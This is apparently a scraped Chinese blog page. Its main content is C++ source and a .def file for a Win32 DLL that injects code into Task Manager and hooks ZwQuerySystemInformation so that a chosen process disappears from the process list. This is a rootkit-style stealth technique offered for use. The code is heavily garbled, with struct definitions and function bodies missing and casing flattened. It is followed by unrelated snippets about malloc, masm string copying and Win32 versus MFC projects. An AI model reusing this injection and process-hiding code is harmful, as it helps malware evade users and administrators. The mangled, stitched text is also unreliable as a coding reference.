新建乙個win32 dll專案,修改cpp檔案如下:
#include "stdafx.h"#include typedef long ntstatus;
#define status_info_length_mismatch ((ntstatus)0xc0000004l)
#define nt_success(status) ((ntstatus)(status) >= 0)
typedef enum _system_information_class system_information_class;
typedef struct _client_id
client_id, *pclient_id;
typedef struct
unicode_string, *punicode_string;
typedef struct _object_attributes
object_attributes, *pobject_attributes;
typedef struct _io_counter*** io_counter***, *pio_counter***;
typedef enum thread_state;
typedef struct _vm_counters vm_counters;
typedef vm_counters *pvm_counters;
typedef struct _system_threads system_threads, *psystem_threads;
typedef struct _system_processes system_processes, *psystem_processes;
typedef
ntstatus
(ntapi *zwquerysysteminformation)(
in system_information_class systeminformationclass,
out pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength optional
);zwquerysysteminformation zwquerysysteminformation = (zwquerysysteminformation)getprocaddress(getmodulehandle("ntdll.dll"), "zwquerysysteminformation");
pvoid g_lpremoteallocbase;
dword getfunaddress(puchar lpfunstart)
else
return dwfunaddress;
}__declspec (naked) void funstart()
};//定義函式開始的位置 release版本 沒用
__declspec (naked) void zwquerysysteminformationproxy()
}ntstatus
ntapi
zwquerysysteminformationcallback(
in system_information_class systeminformationclass,
out pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength optional
) if (nt_success(ntstatus) && systeminformationclass == systemprocessesandthreadsinformation)
else
break;//多個pid比較時候,這裡千萬要去掉!!!
}if (!psystemprocesses->nextentrydelta) break;
prev = psystemprocesses;
psystemprocesses = (psystem_processes)((char *)psystemprocesses + psystemprocesses->nextentrydelta);
} }return ntstatus;
}__declspec (naked) void funend() };//定義函式結束的位置
boolean sethook(dword dwprocessid, dword dwhideid)//引數1注入的目標程序id 引數2當前程序id
; handle hprocess = null;
pvoid remoteallocbase = null;
dword dwfunaddress;
puchar pbuffer;
dwcodestart = getfunaddress((puchar)zwquerysysteminformationproxy);
dwcodeend = getfunaddress((puchar)funend);
dwcodesize = dwcodeend - dwcodestart;//需要注入**的長度
hprocess = openprocess(process_all_access,
false,
dwprocessid
);//開啟目標程序
if (hprocess)
}virtualprotect((pvoid)dwcodestart,
dwcodesize,
page_execute_readwrite,
&oldprotect);}
}bret = writeprocessmemory(hprocess,
remoteallocbase,
(pvoid)dwcodestart,
dwcodesize,
null
);if (bret)
}closehandle(hprocess);
} return bret;
}boolean unhook(dword dwprocessid)
return bret;
}dword gettaskmgrid()
else if (ntstatus == status_info_length_mismatch)
i++;
} else
} while (ntstatus == status_info_length_mismatch);
if (pbuffer)
}if (!psystemprocesses->nextentrydelta) break;
psystemprocesses = (psystem_processes)((char *)psystemprocesses + psystemprocesses->nextentrydelta);
} deletepbuffer;
} return dwprocessid;
}int main(int argc, char* argv)
unhook(dwtaskmgrid);
} else
}else
return 0;
}
新建乙個def檔案內容如下:
library "testhook"description "sethook unhook"
exports
sethook @1
unhook @2
Win32程式設計
win32 malloc函式的底層實現是win32api utf 16編碼以16位無符號整數為單位,注意是16位為乙個單位,不是乙個字元就只有16位,這個要看字元的unicode編碼處於什麼範圍而定,有可能是2個位元組,也可能是4個位元組現在機器上的unicode編碼一般就是指utf 16 以兩個位...
win32彙編使用win32 api實現字串拷貝
字串拷貝,呼叫win32的lstrcpy函式 拷貝了以後用訊息框顯示一下 386 model flat,stdcall option casemap none include s masm32 include windows.inc include s masm32 include user32.i...
win32控制台 win32工程 MFC工程的區別
空專案 控制台 問2個問題即可。1.控制台 vs win32 mfc?嗯,有不有臉?有臉,選win32或mfc。沒有臉,選控制台。臉就是視窗,就是window.s 這個有臉 這個沒臉 控制台與win32 mfc 互動方式的不同,前者是cml 命令模式 後者是gui 使用者介面 2.mfc vs wi...